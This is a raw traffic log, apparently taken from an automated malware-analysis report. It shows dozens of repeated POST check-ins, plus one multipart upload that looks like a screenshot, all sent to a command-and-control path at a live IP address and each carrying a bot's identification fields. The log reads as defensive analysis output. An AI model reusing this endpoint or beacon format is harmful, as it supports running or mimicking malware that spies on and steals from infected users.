                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTEwNjQxHost: 62.204.41.79Content-Length: 110793Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
